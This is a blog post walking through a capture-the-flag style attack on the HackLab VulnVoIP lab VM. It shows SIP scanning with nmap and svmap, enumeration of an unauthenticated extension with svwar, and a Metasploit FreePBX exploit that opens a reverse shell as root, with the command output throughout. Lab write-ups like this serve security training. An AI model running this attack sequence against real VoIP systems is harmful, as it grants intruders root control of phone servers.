HackLab – VulnVoIP

So yes there is a REALLY easy way, and a harder way to do VulnVoIP. This is a quick and dirty write-up on the easy way…

root@kali:~# nmap -sU -p 5060 172.16.28.160

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-14 16:28 EST
Nmap scan report for 172.16.28.160
Host is up (0.00032s latency).
PORT     STATE         SERVICE
5060/udp open|filtered sip
MAC Address: 00:0C:29:D8:2E:59 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
root@kali:~#

After that scan as well as running svmap…

root@kali:~# svmap 172.16.28.160
| SIP Device         | User Agent            | Fingerprint |
------------------------------------------------------------
| 172.16.28.160:5060 | Asterisk PBX 1.6.2.11 | disabled    |

root@kali:~#

After some checking we found an extension that required not authentication…


root@kali:~# svwar -e100 172.16.28.160 -x 172.16.28.245 --force WARNING:TakeASip:Bad user = SIP/2.0 401 - svwar will probably not work! | Extension | Authentication | ------------------------------ | 100 | noauth | root@kali:~#

Installed a VoIP soft phone and connected to the extension.

Then we setup the Metasploit module exploit/unix/http/freepbx_callmenum

Make sure you are logged into the softphone.

msf exploit(freepbx_callmenum) > exploit
 
[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
msf exploit(freepbx_callmenum) > exploit
 
[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
msf exploit(freepbx_callmenum) > exploit

[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8OHombj62g8rnmQI;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8OHombj62g8rnmQI\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.175:4444 -> 192.168.1.175:52476) at 2014-12-15 21:42:13 -0500
 
id
uid=0(root) gid=0(root)

We have root!

Keep an eye out for the next post on the more fun way to root HackLab – VulnVoIP.

1 thought on “HackLab – VulnVoIP

Leave a Reply

Your email address will not be published. Required fields are marked *

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.